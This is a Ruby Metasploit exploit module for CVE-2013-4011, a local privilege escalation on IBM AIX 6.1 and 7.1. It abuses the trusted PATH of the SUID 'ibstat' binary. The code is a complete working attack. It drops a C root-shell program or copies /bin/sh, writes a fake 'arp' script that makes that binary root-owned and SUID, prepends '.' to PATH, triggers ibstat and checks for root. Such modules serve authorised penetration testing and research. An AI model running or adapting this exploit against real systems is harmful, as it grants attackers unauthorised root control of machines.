metasploit-framework/modules/exploits/aix/local/ibstat_path.rb

151 lines
4.9 KiB
Ruby

# Not sure if the deps are correct
require 'msf/core'
require 'rex'
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
def initialize(info={})
super( update_info( info, {
'Name' => 'ibstat $PATH Privilege Escalation',
'Description' => %q{
This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
},
'Author' =>
[
'Kristian Erik Hermansen', #original author
'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
],
'References' =>
[
[ 'CVE', '2013-4011' ],
[ 'OSVDB', '95420' ],
[ 'BID', '61287' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
],
'Platform' => [ 'aix' ],
'Arch' => [ 'ppc' ],
'Targets' =>
[
[
'IBM AIX Version 6.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'AIX' => '6.1',
}
],
[
'IBM AIX Version 7.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'AIX' => '7.1',
}
],
],
'DefaultTarget' => 1,
}
))
register_options([
OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
], self.class)
end
def exploit
if not is_vuln()
return
end
root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
arp_file = "#{datastore["WritableDir"]}/arp"
if (is_gcc_installed == true)
write_c_file("#{root_file}")
print_status("Compiling source...")
cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
print_status("Compilation completed")
print_status("Deleting source...")
cmd_exec "rm #{root_file}.c"
else
cmd_exec "cp /bin/sh " + "#{root_file}"
end
print_status("Writing custom arp file...")
write_arp_file("#{arp_file}","#{root_file}")
print_status("Custom arp file written")
print_status("Updating PATH environment variable...")
cmd_exec 'PATH=.:$PATH'
cmd_exec 'export PATH'
print_status("Triggering vulnerablity...")
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
print_status("Removing custom arp...")
cmd_exec "rm #{arp_file}"
print_status("Checking root privileges...")
verify_root("#{root_file}")
end
def is_gcc_installed
print_status("Checking if gcc exists...")
gcc_version = cmd_exec 'gcc -v'
gcc_array = gcc_version.split("\n")
gcc_array.each do |res|
if res.include? ("gcc version")
print_good("gcc found! " + "(" + "#{res}" + ")")
return true
end
end
print_status("gcc not found. Using /bin/sh from local system")
return false;
end
def write_c_file(filename)
c_file = filename + ".c"
print_status("Dropping file " + c_file + "...")
cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
cmd_exec "echo \"int main()\" >> " + c_file
cmd_exec "echo \"{\" >> " + c_file
cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
cmd_exec "echo \"setregid(0,0);\" >> " + c_file
cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
cmd_exec "echo \"return 0;\" >> " + c_file
cmd_exec "echo \"}\" >> " + c_file
end
def write_arp_file(arp_file, bin_file)
cmd_exec "echo \"#!/bin/sh\" > " + arp_file
cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
cmd_exec "chmod 0555 " + arp_file
end
def verify_root(filename)
cmd_exec filename
id_output = cmd_exec "id"
if id_output.include? ("euid=0(root)")
print_good("Got root! (euid)")
elsif id_output.include?("uid=0(root)")
print_good("Got root!")
else
print_status("Exploit failed")
end
end
def is_vuln()
ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
if ls_output.include? ("-r-sr-xr-x")
print_good("Target is vulnerable")
return true
else
print_status("Target is not vulnerable")
return false
end
end
end